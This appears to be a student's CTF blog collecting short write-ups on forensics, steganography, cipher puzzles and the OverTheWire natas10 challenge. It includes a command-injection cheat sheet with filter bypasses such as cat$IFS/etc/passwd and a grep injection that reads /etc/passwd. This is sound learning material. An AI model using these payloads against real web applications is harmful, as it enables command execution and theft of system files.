Hack the world

Problem:  the url of the problem https://overthewire.org/wargames/natas/natas10.html Step 1: view the source file. As we can see, the command filter some characters: ';', '|', '&'. When we type something in the input box, it will grep the word in 'dictionary.txt'. Consequently, we cannot avoid implementing 'grep', and we cannot append our own command either because of the filter.   Step 2: try to make use of the grep command. We are going to use 'grep .*' to realize the function of 'cat' because it will match all the characters in the file. The command is like this: grep .* /etc/passwd Step 3: comment out the dictionary.txt  In addition, the original grep will match the strings in 'dictionary.txt' which is not contains what we need. So we use '#' to comment it out.  The command is like this: grep .* /etc/passwd # dictionary.txt Step 4: find the path of the password fi...

Problem: find the flag hide in the wav file Tool: Audacity Step 1: open the wav file with Audacity The waveform looks pretty uniform, it might be binary or Morse code. Step 2: record the wave as Morse code.  - .. -- ./ - --- / ..-. .-.. .. .--. / - .... . / ... . -- .. - -.-. …. TIME TO FLIP THE SEMITCH 

Basic command injection:  command injection in input box: 1; ls 1 && ls 1 | ls 1 || ls    Only if the first cmd fail  `ls` $(ls)  bypass the filter cat</etc/passwd $ {cat,/etc/passwd} cat$IFS/etc/passwd echo${IFS}"hello"${IFS}&&cat${IFS}/etc/passwd X=$'cat\x20/etc/password'&&$X

Problem: analysis memory file. To find the content writing on the screen of the notepad. Hint: the strings has ended with y, and the  character contains an extra 'y'. Don't submit two 'y' s Tools: Volatility Solution:  Step 1: Selecting a Profile First, we can check the information of this memory file. $ vol.py -f memory-image.vmem imageinfo  The profile of this computer is Win7SP1x64. Step 2: Viewing Running Processes The notepad was writing so that this process should be on the background.  $vol.py -f memory-image.vmem --profile=Win7SP1x64 cmdline  we successfully found the pid of the notepad process which is '2740'. Step 3: Get the memory of notepad's process. Dump extracted '2740.dmp' to get the addressable memory of the process.  $vol.py -f memory-image.vmem --profile=Win7SP1x64 -p 2740 memdump --dump-dir . Step 4: Find the strings  Because the strings ended with a '...

Cyber start My first CTF competition was on  14 Feb 2020, also it's my first time to get in touch with CTF.  It was hosted by our university's IT department. I finished all the challenges in 5 minutes. This sparked my interest in the CTF. Cyber start & Girls Cyber Start After the competition in my University, I move up to  Girls Cyber Start to continue my CTF. When I have done more than half of the challenges, my University informed us to do the Cyber start game  on behalf of our school. The challenges are identical as Girls Cyber Start . I did both of them because I was told that the scores cannot be merged. Cyber FastTrack  It' s my third time to perform the competition, maybe it's the first official time. I got 20th place in it. I found that I am very good at digital forensics, web and log analyzing. Besides, I found that binary weighted much so that I should take more time to practice it.

Problems : we are going to analysis the windows image file. Tool: kali, autopsy  Step1 : kali has autopsy ,  so I don't need to install it. But I have to run it with root privilege. Step 2: Open the URL in the browser and created a case to load the image. Problem 1: find the hostname of the computer Step 1: Windows event always stores the hostname, so I found the path of the host event and open it as hex, it's not easy to see, then I exported it and open it in the windows virtual machine. Step 2: In Windows, I added the extension as 'evtx', then I double-clicked it to read the content in it. We found the host name as ' RESARCH-LAB-42 '. Problem 2: find the customized task scheduler of the user, include all the arguments, path and command. Step 1: find the task path of windows We know that the task schedule is stored in  c :/ windows/system32/Tasks I found that there is a folder named 'Not a CRON', it is very...

Problem: find the flag in a file. Tools: binwalk, ihex, file signature  Solution: Step 1: check the info of the file  First I used ' binwalk ' tool to check the file. It looked like a hidden-message-picture because of ' Zlib '. Step 2: Confirm the file type I used  ihex  to check the file, I found that it was ended by 'PNG'. Step 3: find the file type I check the header of the file with 'file signature' website.   https://www.garykessler.net/library/file_sigs.html Step 4: Complete the file header It showed that it changed some bits in the header. So I changed  'AE42082' to '89504E47' and save the file. Then I added the extension of the file as 'png' then open it. Flag: Are_Shoes_Hats_For_Feet

Problem: decode the cipher in a text file. Tools: ihex, python, sublime Solution:  Step 1: open the file  It' s a text file. When I open it, I found that there are some invisible characters on it. Step 2: open it as ihex Then I open it with ihex,  I found it's wired that there were 'C3' s in it. Step 3: find the trick in it. Then I copied the characters and removed all the 'C3' s. 86 AC A1 A7 C2 BA 8D A1 B3 B4 A5 B2 9F 8F A6 9F 93 B7 A9 B4 A3 A8 A9 AE A7 9F 82 A9 B4 B3 0A  I found the difference between 'A1' and 'A7'  was 6, then I thought they might be 'a' and 'g' in word 'flag'.  Then I changed the offset as 64 in order to print 'A1' to '97' which is ASCII code of 'a' and printed all of them. Flag?zMaster_Of_Switching_Bits

problem: tool:  evtx_view , Autopsy  Step 1:  export the security event from the image: Because login log stores in 'security.evtx'.  Step 2: use evtx_view to dump the content of the event as a file 'result': We can also import it in windows VM to check the result, but transfer to a file is much easier to filter the result. python evtx_dump.py ~/Desktop/evtx_view.v.1.06.osx/111.evtx > result from the  https://eventlogxp.com/blog/logon-type-what-does-it-mean/  , we found related  windows logon type that for remote login: Logon type 3:   A user or computer logged on to this computer from the network. Logon type 8:  NetworkCleartext. A user logged on to this computer from the network. The user’s password was passed to the authentication package in its unhashed form. The built-in authentication packages all hash credentials before sending them across the network. The credentials do not traverse the ...